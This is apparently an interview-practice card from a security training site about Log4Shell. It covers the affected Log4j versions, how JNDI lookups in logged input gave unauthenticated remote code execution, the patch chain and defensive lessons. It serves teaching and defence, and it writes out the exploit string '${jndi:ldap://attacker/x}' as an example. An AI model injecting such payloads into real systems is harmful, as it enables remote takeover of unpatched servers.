Case C08020 · Famous breaches · L2 Practitioner
Log4Shell
Practise as: Explain it · Interview · Deep dive
Interview questionWhat is Log4Shell, and why was it rated CVSS 10?
- 01 What is it?
- 02 How is it abused?
- 03 How do you stop it?
What a strong answer covers
Try it out loud first. Then check yourself:
- CVE-2021-44228 in Apache Log4j 2 (2.0-beta9 to 2.14.1), disclosed publicly 9 December 2021
- Message lookups resolved ${jndi:ldap://attacker/x} in logged strings, loading a remote Java class: unauth RCE
- Any logged user input (User-Agent, usernames, chat) could trigger it, and Log4j was embedded everywhere
- Fix chain: 2.15.0, 2.16.0 (CVE-2021-45046) removed lookups, 2.17.0 (CVE-2021-45105), 2.17.1 (CVE-2021-44832)
- Lessons: SBOM and dependency inventory, egress filtering (would block LDAP callbacks), WAF only as stopgap
If the interviewer pushes back
- How far does egress filtering protect unpatched Log4Shell hosts, and what can still leak via DNS lookups?
Go deeper
cardosec draws a security topic and gives you a clock: explain it out loud with no notes, then see what you covered and what you missed. Free during early access.